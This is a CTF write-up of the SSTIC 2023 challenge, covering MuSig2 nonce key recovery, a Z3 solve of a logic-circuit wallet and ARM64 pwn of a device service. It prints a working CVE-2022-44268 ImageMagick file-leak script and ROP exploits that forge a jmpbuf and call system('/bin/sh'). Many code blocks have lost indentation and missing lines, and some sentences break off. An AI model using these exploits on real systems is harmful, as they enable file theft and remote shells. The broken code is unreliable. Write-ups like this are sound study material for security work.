[SSTIC 2023] Solving the SSTIC CTF Challenge – Digital Signatures, Blockchains, Power Signal Analysis, And More
Another year, another SSTIC challenge! It was great fun this year and I was introduced to a lot of new concepts in a short time. This year’s challenge featured a more parallel structure, with two short intro challenges leading up to a set of four “key recovery” challenges that could be completed in any order, and culminating in a final blockchain-based reversing challenge. This year was particularly heavy on cryptography, but also featured a bit of web exploitation, quite a bit of reverse engineering, and binary exploitation. As usual, the goal was to recover an email address ending in @sstic.org
and send an email to complete the challenge. Along the way, flags could be captured and (optionally) submitted to the website to publicly display progress.
My timeline of the stages runs as follows (all times in my timezone, GMT-7); a fuller accounting of time is given in the Timeline section.
- Fri Mar 31, 10:00 am: Start the challenge.
- Fri Mar 31, 10:05 am: Complete stage 0.
- Fri Mar 31, 10:55 am: Complete stage 1.
- Fri Mar 31, 1:14 pm: Complete stage 2.a. (I retrieved the key at this time, but did not submit the flag until 3:43pm)
- Fri Mar 31, 3:40 pm: Complete stage 2.b.
- Sat Apr 1, 5:13 am: Complete stage 2.d.
- Sun Apr 2, 4:57 am: Finish solving stage 3, but still need stage 2.c key to progress.
- Sun Apr 2, 8:06 am: Complete stage 2.c.
- Sun Apr 2, 8:13 am: Complete stage 3.
- Sun Apr 2, 8:22 am: Send email to complete the challenge.
The challenge this year was highly parallel, unlike the linear setup from the two past years. Everything necessary to solve 2.a~2.d and 3 (essentially all remaining challenges) was made available after solving stage 1. The challenge was presented in French, as usual, but most of the challenge is language-agnostic, and English translations are provided in this writeup.
The release of the challenge included this announcement:
Salud deoc’h! Your new Trois Pains Zéro bakery has decided to innovate in order to avoid queues and allow you to taste our flagship recipe: the famous quatre-quarts (pound cake). From July 1, 2023, you will only need to acquire a Non-Fungible Token (NFT) from our collection on OpenSea, and present it in store to receive your precious cake. The purchase page will soon be available for all our customers and we hope to see you soon at the store. Delightfully yours, Your Trois Pains Zéro bakery
The challenge is to access the NFT purchasing interface on the bakery site before anyone else, and to prove it by contacting the pastry chef by email to an address of the form
Tools Used
Here, I list all of the tools that I used throughout the challenge.
- Computer: 2019 MacBook Pro, macOS 12.6.3
- Text editor: BBEdit
- VMWare Fusion 11, with an Ubuntu 20.04 VM:
- gdb 12.1
- qemu-user
- Ghidra 10.2.3
- Python 3.10
- thoth tools for Cairo
- SageMath 9.0
Stage 0
The introduction announcement includes a link to an NFT on OpenSea, which depicts a cute dog wearing a lobster costume and pastry chef hat. Checking the contract on Etherscan, we see two files, ERC1155.sol and TroisPainsZeroJNF.sol. In TroisPainsZeroJNF.sol, we see this:
string constant BASE_URI =
This base64 blob decodes to
{"name": "Trois Pains Zero",
"description": "Lobsterdog pastry chef.",
"image": "https://nft.quatre-qu.art/nft-library.php?id=12",
"external_url": "https://nft.quatre-qu.art/nft-library.php?id=12"}
Indeed, if we visit the URL, we get an SVG showing the lobster dog. Checking the other IDs, we find that ID #1 contains a flag: SSTIC{6a4ec745c1403b1ebf09fbd5a3021d1226330197641d4f65008ba0cd0fe48c62}
! Stage 0 done.
Stage 1
If we don’t supply an id
parameter, we get this page, which offers to resize images for creating an NFT gallery. If we upload a PNG picture, it will resize it; uploading any other kind of picture seemingly produces the error “Invalid image header”. In the HTTP headers, we find the line X-Powered-By: ImageMagick/7.1.0-51
Checking online, we find that this version of ImageMagick is vulnerable to CVE-2022-44268, which provides an arbitrary remote file leak when converting PNG files. This blog post provides a great overview of the bug and the code path in ImageMagick that triggers it. It’s extremely easy to exploit: adding a tEXt
chunk of type profile
with a file path (e.g. /etc/passwd
) as the content is sufficient; the converted image will contain a zTXt
(compressed text) chunk containing the contents of the target file.
I started by simply submitting the PoC given in the blog post, which worked perfectly and dumped the contents of /etc/passwd
. Then I wrote a simple script, dl_file.py
to construct PNG files and download arbitrary remote documents:
import requests
import struct
import zlib
import sys
import io
import base64
import os
PNG_SIG = b"\x89PNG\r\n\x1a\n"
# from pypng
def write_chunk(outfile, tag, data=b''):
data = bytes(data)
outfile.write(struct.pack("!I", len(data)))
checksum = zlib.crc32(tag)
checksum = zlib.crc32(data, checksum)
checksum &= 0xffffffff
outfile.write(struct.pack("!I", checksum))
def write_chunks(out, chunks):
"""Create a PNG file by writing out the chunks."""
for chunk in chunks:
write_chunk(out, *chunk)
def chunks(infile):
sig = infile.read(8)
assert sig == PNG_SIG
while 1:
chunk = infile.read(8)
if not chunk:
length, type = struct.unpack("!I4s", chunk)
data = infile.read(length)
assert len(data) == length
checksum = infile.read(4)
assert len(checksum) == 4
yield (type, data)
def make_cve_png(filename):
chunks = [
(b"IHDR", bytes.fromhex("00 00 00 01 00 00 00 01 01 00 00 00 00")),
(b"IDAT", bytes.fromhex("08 D7 63 68 00 00 00 82 00 81")),
(b"tEXt", b"profile\0" + filename.encode("utf8") + b"\0"),
(b"IEND", b""),
f = io.BytesIO()
write_chunks(f, chunks)
return f.getvalue()
filename = sys.argv[1]
png = make_cve_png(filename)
r = requests.post("https://nft.quatre-qu.art/nft-library.php", data=dict(filedata=base64.b64encode(png)))
for ctype, cdata in chunks(io.BytesIO(r.content)):
if ctype == b"zTXt" and cdata.startswith(b"Raw profile type"):
data = zlib.decompress(cdata.split(b"\0\0", 1)[1])
clean_filename = os.path.abspath(os.path.join("/1/2/3", filename))
os.makedirs("leak/" + os.path.dirname(clean_filename), exist_ok=True)
with open("leak/" + clean_filename, "wb") as outf:
outf.write(bytes.fromhex(data.split(None, 1)[1].decode()))
print(ctype, cdata)
print("Error: no zTXt found!")
Running this to download nft-library.php
produced the full original script, which contains this useful comment (translated):
// SSTIC{8c44f9aa39f4f69d26b91ae2b49ed4d2d029c0999e691f3122a883b01ee19fae}
// A backup of the infrastructure is available in the following files
// /backup.tgz, /devices.tgz
That’s the stage 1 flag! I then used dl-file.py
again to download backup.tgz
and devices.tgz
Main Challenge
Unpacking backup.tgz
and devices.tgz
yields a whole bunch of new files, including backup/info.eml
, which reads (translated):
Hi Bertrand,
As you know, we are setting up the infrastructure for the upcoming release of our NFT on https://trois-pains-zero.quatre-qu.art/.
We have chosen to protect our administration interface using 4 of 4 multi-signature encryption using different devices to store private keys.
As a reminder, you will find the necessary files in the backup:
– the script I used to participate in the multi-signature protocol: musig2_player.py. I’ve also included the signature log file we made last Thursday along with our 4 public keys.
– a digital wallet for which you have the password: seedlocker.py
– a physical device, available here device.quatre-qu.art:8080, I think Charly has the password. If you want to test on your own equipment you will find the UI update on the backup server with the libc used. We have set up limitations, one based on proof of work, we have also provided you with the solver script (pow_solver.py) and a password “fudmH/MGzgUM7Zx3k6xMuvThTXh+ULf1”.
The password is not the one for the equipment but the one for the protection.
– For the last equipment, Daniel lost his pin code.
We tried to extract the information by attacking the secure memory with fault injections but without success 😒.
For information, secure memory takes a mask as an argument and uses the stored value XORed with the mask. The measurements we made during the experiment are stored in data.h5. It is too large for backup but you can retrieve it at this address: https://trois-pains-zero.quatre-qu.art/data_34718ec031bbb6e094075a0c7da32bc5056a57ff082c206e6b70fcc864df09e9.h5.
Maybe you know someone who could help us find the information?
Good luck!
The remaining files are as follows:
: Encrypted flag files and a decryption routinebackup/server
: The source code for the server running at https://trois-pains-zero.quatre-qu.art/devices
: Device-specific files for each of the devices which store private keys.
Reading through the server code, we can see that it will require a multi-signature using all four keys to access the admin area, then it will require a coupon code in order to actually order an NFT. In fact, the code which validates the coupon is stored on a Starknet blockchain which we can freely interact with, meaning that everything we need to solve the remainder of the challenge is provided in this package.
Our goal, then, is to recover the four private keys (corresponding to stages 2.a through 2.d) to construct a signature to access the admin area, then construct a valid coupon by reverse-engineering the Starknet blockchain contract (Stage 3), and finally contact the pastry chef (which, according to the server code, will require solving some kind of CAPTCHA). Let’s go!
Note that, below, I show the stages in logical order, but this is not the order in which I actually solved the challenges. I solved them in the order 2a, 2b, 2d, 3 and 2c. In other words, I determined how to generate coupons for the final step before actually having all the private keys. Hence, it only took me a few minutes to go from solving 2.c to solving the entire challenge.
Stage 2.a
The description for the stage 2.a files (devices/deviceA
) reads:
the script I used to participate in the multi-signature protocol: musig2_player.py. I’ve also included the signature log file we made last Thursday along with our 4 public keys.
MuSig2 is a multiparty signature algorithm. In brief, it allows N users with separate private/public keys to jointly sign a message which can be validated using an aggregated public key. This signature algorithm is the one which is needed in step 3 to log in as an admin.
In this challenge, the author of the email (“A”) provides public keys for all participants, code for implementing their end of the MuSig2 protocol (N=4) and a log of their interactions with the MuSig2 aggregator; the code for the aggregator is not provided and is not needed for this challenge.
Briefly, the MuSig2 algorithm over elliptic curves works in two rounds. Let G be the generator of the curve, p be the order of the curve, (x_i, X_i) be the private/public key pair for each user i and L be the full set of public keys. Let \mathbf{H}_\mathrm{agg}, \mathbf{H}_\mathrm{non}, \mathbf{H}_\mathrm{sig} be hash functions taking arbitrary inputs and producing numbers in \mathbb{Z}_p. Except for the private keys, all of the parameters here are provided to us in baker_pubkey.py
and musig2_player.py
. Let m be the message to be signed.
- In the first round, each user i selects N nonce values r_{i,j}, and computes R_{i,j} = r_{i,j} G. Each user sends their R_{i,j} values to the aggregator.
- The aggregator takes these R_{i,j} values, computes R_j = \sum_i R_{i,j}, and sends the aggregated R_j values to each user.
- In the second round, each user computes several shared values: the key aggregation coefficients a_i = \mathbf{H}_\mathrm{agg}(L, X_i), the aggregate public key X = \sum_{i} a_i X_i and the values b = \mathbf{H}_\mathrm{non}(X, (R_1, …, R_N), m), R = \sum_{j} b^{j-1} R_j and c = \mathbf{H}_\mathrm{sig}(X, R, m). Each user i computes an individual signature share s_i = ca_i x_i + \sum_j r_{i,j} b^{j-1} \bmod p and sends it to the aggregator. The aggregator finally computes s = \sum_i s_i \bmod p, and outputs (R, s) as the aggregated signature.
We’re provided with a full log of everything sent to and received from the aggregator for five different signatures, from A’s point of view (we do not see the traffic for the other participants).
Normally, nonces should be chosen randomly for maximum security. With many signature schemes, the nonce can also be chosen using a hash function of the message, so long as the same nonce is not used to sign two distinct messages. In the provided implementation of MuSig2, they are using this hash-based approach:
def get_nonce(x,m,i):
# NOTE: this is deterministic but we shouldn't sign twice the same message, so we are fine
digest = int.from_bytes(hashlib.sha256(i.to_bytes(32,byteorder="big")).digest(),byteorder="big")
m_int = int.from_bytes(m, "big")
return pow(x*m_int, digest, order)
The nonce calculation used here is unusually simple: it’s (x_i m)^{\mathbf{H}(j)} where j can only be 1, 2, 3 or 4.
Recall that s_i = ca_i x_i + \sum_j r_{i,j} b^{j-1} \mod p and we can see s_1 in our log file. Expanding this using our implementation of r = get_nonce(...)
, we have s_1 = ca_1 x_1 + \sum_j (x_1 m) ^ {\mathbf{H}(j)} b^{j-1} \mod p. In this equation, we know everything except x_1, which means that this is actually just a polynomial over x_1! Furthermore, since the exponent of x_1 is either 1 or \mathbf{H}(j), we can actually treat this as being a linear equation in the five unknowns x_1, x_1 ^ {\mathbf{H}(1)}, x_1 ^ {\mathbf{H}(2)}, x_1 ^ {\mathbf{H}(3)}, x_1 ^ {\mathbf{H}(4)}. We happen to have five equations, corresponding to the five observed signatures, so we can find x_1 by simply solving a linear system of equations in \mathbb{Z}_p.
All we need to do is whip up a script to recalculate the necessary values and spit out the system of equations:
from ecpy.curves import Curve, Point
import hashlib
from dataclasses import dataclass
import ast
import sys
import baker_pubkey
from musig2_player import Hash_agg, Hash_non, Hash_sig, key_aggregation
cv = Curve.get_curve("secp256k1")
G = cv.generator
order = cv.order
exps = [int.from_bytes(hashlib.sha256(i.to_bytes(32,byteorder="big")).digest(),byteorder="big") for i in range(1, 4+1)]
class Message:
msg: bytes
sent_Rs: list[Point]
recv_Rs: list[Point]
sent_s: int
recv_s: int
def parse_points(s: str) -> list[Point]:
s = [int(c, 0) for c in s.split()]
return [Point(s[i], s[i+1], cv) for i in range(0, 8, 2)]
chunks = open("../../chall/devices/deviceA/logs.txt").read().split("=====")
messages = []
for chunk in chunks:
rows = [r.split(": ", 2)[2] for r in chunk.strip().split("\n")]
int(rows[4], 0),
int(rows[5], 0),
def get_nonce_coeff(m, i):
digest = int.from_bytes(hashlib.sha256(i.to_bytes(32,byteorder="big")).digest(),byteorder="big")
m_int = int.from_bytes(m, "big")
return pow(m_int, digest, order)
nb_players = 4
L = [baker_pubkey.MY_PK, baker_pubkey.BERTRAND_PK, baker_pubkey.CHARLES_PK, baker_pubkey.DANIEL_PK]
a = Hash_agg(L, baker_pubkey.MY_PK)
print("polys = [")
for m in messages:
# first round
nonce_coeffs = [get_nonce_coeff(m.msg, j+1) for j in range(nb_players)]
# second round
X = key_aggregation(L)
b = Hash_non(X, m.recv_Rs, m.msg)
R = Point.infinity()
for j in range(len(L)):
exp = pow(b, j, order)
R += exp * m.recv_Rs[j]
c = Hash_sig(X, R, m.msg)
poly_coeffs = [(c * a) % order]
for j in range(nb_players):
poly_coeffs.append((nonce_coeffs[j] * pow(b,j,order)) % order)
print(poly_coeffs, end=",\n")
print("s =", [m.sent_s for m in messages])
We can then feed everything into a short Sage script to solve the system and get our first private key:
polys = [...]
s = [...]
n = 115792089237316195423570985008687907852837564279074904382605163141518161494337
A = matrix(GF(n), polys)
b = matrix(GF(n), s).transpose()
xs = A.solve_right(b)
This spits out 32397748964588217353341318317432783880090649436123362081161843221664749742056, our first private key! We can feed it to flags/crypt.py
to get the corresponding flag: SSTIC{dc3cb2c61cb0f2bdec237be4382fe3891365f81a0fb1c20546d888247dd9df0a}
Stage 2.b
The description for the stage 2.b files (devices/deviceB
) reads:
a digital wallet for which you have the password: seedlocker.py
We’re given seedlocker.py
and seed.bin
. seedlocker.py
defines two classes G
and E
; E
is responsible for the password check, and loads a bunch of state out of seed.bin
The password is sent to the E
instance two bits at a time via e.set_uint()
. The password is checked as follows:
password = bytes.fromhex(sys.argv[1])
e = E()
for b in password:
for i in range(4):
key = (b >> (i * 2)) & 3
e.set_uint(e.key, key)
for _ in range(2):
if e.get_uint(e.good) == 1:
My thought process for reversing this roughly looked like this:
is a list ofG
instances which are referred to by index ine.get
is setting thevalue
of severalG
instances ine.gs
basically callse.get
on severalG
instances (by index).e.get
does a single binary operation from a singleG
depending on thatG
‘s type and value.- Those binary operations look like “and”, “or”, “xor” and “not” with optional inversion of inputs.
- This looks like a digital circuit, with each
representing a single digital logic gate, and wherestep
effectively updates the simulation of the circuit.dff
(g.kind == 9
) elements are flip-flops, which are clocked each step.
So, we can infer that the password is fed two bits at a time to two input gates (kind 3), then processed through a big digital circuit which eventually produces a “1” bit at a specific gate (e.good
, gate 1940) if the password is accepted. I decided to first try and graph the circuit to create a digital logic diagram. seedlocker_graph.py
generates a Graphviz diagram which can be rendered into a huge graph. Here’s a small chunk of the graph (click for the full thing as a PDF):
It’s not very interpretable, unfortunately. But there’s a small circuit off to the right hand side that does look interesting:
This piece takes only constant inputs, and produces an output in and_4853
which is fed to the AND gates, ultimately feeding into the e.good
gate (and_1940
). If we print out the value of and_4853
as we step the simulation, we get the following repeating 256-element sequence:
There’s a single 1
at step 80, and 0s everywhere else. This tells us that the password is most likely 80 bits long (two steps for every two bits of the password). We can confirm this by printing out the output of ff_3128_0
: it goes to 1 after 81 steps and stays there. As its output is inverted to the next AND, any password longer than 80 bits will never validate.
I tried to apply similar logic to understanding the other inputs to the e.good
gate, printing out their values while varying the password, but was not able to make any headway – the circuit is too convoluted. So, I turned instead to just solving for the password using an SMT solver, Z3.
In brief, all of the gate operations, including the flipflops, can be represented symbolically as operations on (unknown) password bits, resulting in a logical equation that can be solved by a boolean satisifability solver. Although such problems are NP-hard in the general case, most circuits are not that complex, and SMT solvers like Z3 have a lot of tricks to attack such problems.
All we have to do is modify the script to compute gate values symbolically instead of concretely – password inputs are rewritten as Z3 Bool
variables, and boolean operations are replaced by Z3 operators where appropriate. A relatively straightforward transformation yields the script seedlocker_z3.py
, which spits out a password 995b90996f4564409191
after a few minutes!
Trying this password in the original seedlocker.py
works perfectly, and spits out the following output:
Seed: easy sponsor novel jazz theory marble era hurt transfer ball describe neutral
Private key: 0x81e8d3a6ad341da46e6361b7c1c376b5423e7ad04748077b93a0c20263305824
Public key X: 0x206aeb643e2fe72452ef6929049d09496d7252a87e9daf6bf2e58914b55f3a90
Public key Y: 0x46c220ee7cbe03b138a76dcb4db673c35e2ab81b4235486fe4dbd2ad093e8df4
We have B’s private key! We can finally take this private key to decrypt our stage 2b flag: SSTIC{f5967cae6478fa6bb9ea1bc758aee0961a68a8b4767f74888ce0bb8563a6218e}
Stage 2.c
The description for the stage 2.c files (devices/deviceC
) reads:
a physical device, available here device.quatre-qu.art:8080, I think Charly has the password. If you want to test on your own equipment you will find the UI update on the backup server with the libc used. We have set up limitations, one based on proof of work, we have also provided you with the solver script (pow_solver.py) and a password “fudmH/MGzgUM7Zx3k6xMuvThTXh+ULf1”. The password is not the one for the equipment but the one for the protection.
Reversing the Front-End
We’re given frontend_service.bin
, a Linux ARM64 binary, along with the corresponding ld.so
and libc.so
. We’re also provided with a proof of work solver.
To make interacting with the server faster, I rewrote the challenge solver to use multiprocessing (chalsolve.py
); it takes just a second or two to solve the remote PoW with this on my laptop.
I used Ghidra to reverse frontend_service.bin
. The service launches a server on port 1336, which we can connect to on device.quatre-qu.art:8080 after entering the password and solving the PoW. It connects to another server on (the “backend”), which I was able to simulate with simply cat
(as socat tcp-l:1337,reuseaddr,fork exec:cat
looks like this:
int client_fd[2];
int server_fd;
client_fd[0] = -1;
client_fd[1] = -1;
server_fd = create_server(1336,0);
do {
client_fd[1] = connect_compute("",1337);
} while (client_fd[1] == -1);
client_fd[0] = server_accept_conn(server_fd);
exc_occurred = _setjmp((__jmp_buf_tag *)&jmpbuf);
if (exc_occurred != 0) {
comm_pkt.cmd = 0x133b;
closefd_msg("Closing connection\n",client_fd);
closefd_msg(0,client_fd + 1);
(0x1e10) presents an interactive menu, allowing the user to select “Encrypt”, “Decrypt”, “Sign”, “Admin area” or “Quit”. Here’s a sample interaction:
password: fudmH/MGzgUM7Zx3k6xMuvThTXh+ULf1 Find the number n such that sha256(n + b'DNPKX') starts with 6 zeros number: 07669496 correct Welcome to your device which action do you want to do? E. Encrypt D. Decrypt S. Sign A. Go To Admin Area Q. Quit Option: A Welcome to the Admin area, what do you want to do ? R. Get running firmware U. Update firmware Option: R Enter admin password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Invalid password Welcome to your device which action do you want to do? E. Encrypt D. Decrypt S. Sign A. Go To Admin Area Q. Quit Option: E A. Add data V. View data E. Encrypt data B. Back to main menu Option: A Data size: 1 Data id: 0 Data in hex?(y/n) Option: n Data: x crc (hex): 8cdc1683 Data successfully added A. Add data V. View data E. Encrypt data B. Back to main menu Option: E Message 0 encrypted: c2c291d84cec22a50d53ef2d8e2fb90c Welcome to your device which action do you want to do? E. Encrypt D. Decrypt S. Sign A. Go To Admin Area Q. Quit Option: E A. Add data V. View data E. Encrypt data B. Back to main menu Option: A Data size: 1 Data id: 0 Data in hex?(y/n) Option: n Data: x crc (hex): 11111111 Exception raised: Invalid crc Welcome to your device which action do you want to do? E. Encrypt D. Decrypt S. Sign A. Go To Admin Area Q. Quit Option: E A. Add data V. View data E. Encrypt data B. Back to main menu Option: V Data in hex?(y/n) Option: y Message 0: 78 A. Add data V. View data E. Encrypt data B. Back to main menu Option: B Welcome to your device which action do you want to do? E. Encrypt D. Decrypt S. Sign A. Go To Admin Area Q. Quit Option: Q Closing connection
Everything after correct
is from the service itself. The admin area isn’t much use without the admin password. The other options, Encrypt, Decrypt and Sign, all run through the same sub-menu function (0x1cb8), which allows the user to add data, view data, or (encrypt/decrypt/sign) depending on which top-level option was chosen.
If an exception occurs in any of the interactions, the front-end sets a pointer to the exception message and calls longjmp
to go back to main
before clientloop
, allowing the interaction to be restarted.
Communication with the back-end uses a custom protocol consisting of fixed-length packets of the following format:
struct comm_pkt {
uint resp;
uint cmd;
struct msg {
byte mode;
uint size_mode0;
uint id;
byte data[256];
uint crc;
uint size_mode1;
} payload;
The front-end sends a packet with cmd
set, and the back-end responds with a packet with resp
set. resp = 1
usually means success, while resp = 0
means failure. struct msg
is basically a wrapper for an arbitrary crc-checked blob of data up to 256 bytes in length. Notably, there are two size fields in struct msg
, and which one is used depends on the value of the mode
The front-end has a fixed-length array of ten msg
structures at 0x15020, which are filled in with the “Add data” subcommand. The “Add data” subcommand calls the function at 0x1008, which looks like this:
if (can_add != 1) {
exc_msg = "Cannot add more data\n";
// WARNING: Subroutine does not return
longjmp((__jmp_buf_tag *)&jmpbuf,1);
uVar1 = (ulong)num_msgs;
num_msgs = num_msgs + 1;
read_msg(param_1,msgs + uVar1,mode);
if (num_msgs == 10) {
can_add = 0;
write(param_1,"Data successfully added\n",0x18);
The first part of my exploit contains code to interact with the service; it looks like this:
from pwn import *
if args.DEBUG:
if args.LOCAL:
s = remote("focal", 1336); local = True
s = remote("device.quatre-qu.art", 8080); local = False
if not local:
log.info("Logging in...")
suffix = s.recvuntil(b"'", drop=True)
log.info("Solving challenge (suffix=%s)...", suffix)
prefix = subprocess.check_output([sys.executable, "chalsolve.py", suffix.decode()]).strip()
menucount = 0
def menu(opt):
global menucount
menucount += 1
s.send(opt.encode() + b"\n")
def menusync():
global menucount
while menucount:
menucount -= 1
def sendint(n):
def crc(msg):
import zlib
return "{:08x}".format(zlib.crc32(msg) & 0xffffffff)
def bad_msg(content):
Exploiting the Front-End
The main bug in the front-end is that the “add data” command sets the can_add
global flag after calling read_msg
. read_msg
asks the user to input a message, and there are several ways to make it throw an exception: inputting a bad size (outside of 1-256), a bad packet ID (outside of 0-9), a bad answer to “Data in hex?” (outside of y
) or inputting a bad CRC.
Thus, we can overflow the msgs
array as follows: add 9 messages, then add a 10th message with an incorrect CRC or size. This will throw an exception from read_msg
, preventing the can_add
flag from being set to 0; subsequent messages will be written out of bounds.
The memory layout of the BSS looks like this:
0x15020 msg msgs[10]
0x15ae8 uint num_msgs
0x15aec byte unused[0x134]
0x15c20 char *exc_msg
0x15c28 uint exc_occurred
0x15c30 jmp_buf jmpbuf
So, by overflowing the msgs
array, we can manipulate jmpbuf
, thereby changing where longjmp
goes when an exception occurs.
On this version of libc
, jmpbuf
contains two pointers of interest: the saved LR (x30) register, which tells longjmp
where to return to, and the saved SP (stack pointer). Both are guarded by XORing against a randomly-chosen value (__pointer_chk_guard
). We can create an uninitialized message by specifying a size of 256, then providing an invalid response to the “Data in hex?” question and triggering an exception. Then, we can “View” the message to leak memory contents. Using this, we can leak the exc_msg
pointer to obtain the binary’s base address (PIE is enabled), and the contents of jmpbuf
to leak an obfuscated program address, a libc address which happens to be captured in jmpbuf
, and a stack address:
# fill msgs
for i in range(10):
# insert extra msg, throw exception on msg size
# insert one more to overlap jmpbuf, throw exception on hex choice
# leak jmpbuf
s.recvuntil(b"Message 9: ")
leak = bytes.fromhex(s.recvline().decode())
exe_base = u64(leak[0x18:0x20]) - 0x4060
log.info("exe base: %x", exe_base)
ptr_guard = u64(leak[0x80:0x88]) ^ (exe_base + 0x1f8c)
log.info("ptr guard: %x", ptr_guard)
stack_addr = u64(leak[0x90:0x98]) ^ ptr_guard
log.info("stack addr: %x", stack_addr)
libc_base = u64(leak[0x38:0x40]) - 0x151000
log.info("libc base: %x", libc_base)
# clear messages via password check
This gives us everything we need to fake our own jmpbuf
. We can point the stack into one of the msg
structures in order to get ROP, and freely use gadgets from libc or the binary. The first thing we do is to bypass the password check in the admin area to get the running firmware:
new_jmpbuf = bytearray(leak)
new_jmpbuf[0x80:0x88] = p64(ptr_guard ^ (exe_base + 0x2da8)) # in retr_firmware
new_jmpbuf[0x90:0x98] = p64(ptr_guard ^ (exe_base + 0x159e0))
new_stack = flat([
0, 0, 0, exe_base + 0x159e0 + 0x30, 0, 0, # handle_exc
p32(5) + p32(4),
new_stack = new_stack.ljust(256)
# fill msgs
for i in range(9):
# insert extra msg, throw exception on msg size
# insert one more to overlap jmpbuf, throw exception on crc to longjmp
s.recvuntil(b"Retrieving firmware ...\n")
Here, we’re jumping to 0x2da8, which is in the function that retrieves the firmware after the password check (at 0x2d9c). The specific address jumps to a point after the function has built a stack frame and stored the argument (x0 – pointer to client_fd
) on the stack. So, our fake jmpbuf
will contain a pointer to a fake stack frame that contains a pointer to a faked client_fd
structure, allowing this function to work correctly.
When we run this first exploit (exploit.py
), it successfully reads the firmware and hexdumps it to us, resulting in the file firmware.bin
We can also use ROP to call system("/bin/sh")
to obtain an interactive shell (exploit2.py
client_fd = 5
new_stackaddr = exe_base + 0x15590
new_jmpbuf = bytearray(leak)
new_jmpbuf[0x80:0x88] = p64(ptr_guard ^ (exe_base + 0x249c)) # in readall
new_jmpbuf[0x90:0x98] = p64(ptr_guard ^ new_stackaddr)
rop = flat([
0, exe_base + 0x23b4, # => write, for sanity check
new_stackaddr + 0x30, p32(0xaaaaaaaa), p32(client_fd), 0, 0,
0, libc_base + 0x000dda08, # ldp x0, x1, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
exe_base + 0x1502c, p32(16), p32(client_fd),
0, libc_base + 0xbc8e0, # dup2
0, 0, 5, 0,
0, libc_base + 0x000dda08, # ldp x0, x1, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
0, 0,
0, libc_base + 0xbc8e0, # dup2
0, 0, 5, 1,
0, libc_base + 0x000dda08, # ldp x0, x1, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
0, 0,
0, libc_base + 0xbc8e0, # dup2
0, 0, 5, 2,
0, libc_base + 0x000dda08, # ldp x0, x1, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
0, 0,
0, libc_base + 0x47734, # system
0, 0, exe_base + 0x159e0, 0,
rop1 = bytearray(rop[:0x30])
rop2 = rop[0x30:]
rop1[0x18:0x1c] = p32(len(rop2))
log.info("sending %d-byte rop", len(rop2))
# fill msgs
bad_msg(b"Hello from ROP!\n")
for i in range(4):
for i in range(3):
# insert extra msg, throw exception on msg size
# insert one more to overlap jmpbuf, throw exception on crc to longjmp
s.recvuntil(b"Hello from ROP!\n")
We find that there are two users, backendUser
and frontendUser
, and that we can read /home/backendUser/update-unit
(which is basically identical to our dumped firmware.bin
), but not /home/backendUser/box-B
, which is the binary that is actually running according to ps -ef
. There’s nothing else particularly interesting to see.
Reversing the Backend
The backend binary, according to ps -ef
, is box-B
, but we cannot access that binary. Instead, we have firmware.bin
. Again, it’s an ARM64 binary, so I opened it in Ghidra. However, the binary is corrupted: every section aside from .text
(and .shstrtab
) is missing! .rodata
, .dynamic
, .dynsym
, .dynstr
and so on are all gone, and the data is not even in the binary. The program headers are similarly corrupt: only the program header for the text section is intact, while the other program headers all have an offset and size of zero. Ghidra still decompiles the program fine, but references to libc functions are all unresolved, read-only data like strings are missing, and relocations are all unresolved. This makes reversing a lot more difficult.
Luckily, some of the functionality of the front-end was included in the backend, but not actually referenced in the binary: for example, the function at 0x2a90 in the backend corresponds to the read_msg
function in the front-end (0x33c4), and we can use this correspondence to resolve many libc functions.
The general structure of the backend is similar to the front-end. main
looks like this:
int server_fd;
int client_fd;
int res;
server_fd = create_server(0x539);
client_fd = server_accept_conn(server_fd);
res = setjmp(&pexc->jmpbuf);
pexc->exc_occurred = res;
if (pexc->exc_occurred != 0) {
where exc
is a global variable of the following structure:
struct exc_info {
char *exc_message;
int exc_occurred;
jmp_buf jmpbuf;
} *pexc;
Again, it creates a server, listens for a connection, and uses setjmp
for exception handling. However, instead of providing a textual menu, mainloop
instead reads a single comm_pkt
, and then conditions on the cmd
field. Several commands are defined:
- 0x1337: Add a message. Just like the front-end, there is an array of ten
structures in the BSS. - 0x1338: Encrypt all messages.
- 0x1339: Decrypt all messages.
- 0x133a: Sign all messages. (Not actually implemented: returns the hardcoded message
Some breadcrumbs fell in the secure element signature module and we are currently dusting it
for every message) - 0x133b: Exit.
- 0x133c: Check the password and return 1 in
if it is correct, or 0 if it is not. - 0x133d: Retrieve the firmware.
- 0x133e: Check the password and return the AES key if it is correct, or the input string if it is not.
In “add”, the number of stored messages is checked directly, unlike the backend which uses a separate can_add
variable, so the same vulnerability does not apply. Furthermore, the only place that triggers an exception (longjmp
) is in mainloop
, which will trigger an exception when the resp
is 0. This can happen when receiving an invalid command or when an individual command fails (e.g. wrong password).
The Backend Vulnerability
As I found out after finishing the competition, the (apparently) intended solution was that the 0x133e check was using snprintf
to “copy” the input string to the response packet in the wrong-password case, using the user input as the format string, so you could use %s
and %x
etc. to leak stuff off the stack, including the AES key. Unfortunately, I completely missed this while reversing firmware.bin
due to the lack of symbols. I had this tagged as strncpy
as you can see from my decompilation:
rpkt->resp = 0;
local_30._0_8_ = 0;
local_30._8_8_ = 0;
local_30._16_8_ = 0;
local_30._24_8_ = 0;
local_30[32] = 0;
rpkt->cmd = 0x1337;
(pcVar2->payload).size_mode0 = 0x32;
(pcVar2->payload).size_mode0 = 0x20;
uVar5 = 0;
Note that the real strncpy
has the arguments in a different order (dst
, src
, n
), which should have been a hint, but I did not catch this during my solution attempt.
Instead, I found a different bug. The add function (at 0x1340) checks that the size is valid before adding a message, but only for the size field corresponding to the mode
of the message. So, it checks size_mode0
if mode = 0
, and size_mode1
if mode = 1
. However, the encrypt (0x1718) and decrypt (0x1830) functions will directly use size_mode0
and size_mode1
respectively without checking the mode of the message. Thus, by sending a message with an out-of-bounds size_mode0
and mode = 1
, we can cause an overflow in encrypt
, and vice-versa for decrypt
and decrypt
look like this:
int encrypt(int fd) {
int ret;
uint size;
uint i;
msg *msg;
if (*p_msg_count == 0) {
ret = 0;
else {
i = 0;
while( true ) {
if (*p_msg_count <= i) break;
msg = p_msgs + i;
size = do_encrypt(aes_key,paes_nonces + (ulong)i * 0x10,msg->data,msg->size_mode0);
msg->size_mode1 = size;
msg->mode = 1;
rpkt->resp = 1;
i += 1;
ret = 1;
return ret;
int decrypt(int fd) {
int ret;
uint i;
msg *msg;
byte *nonce;
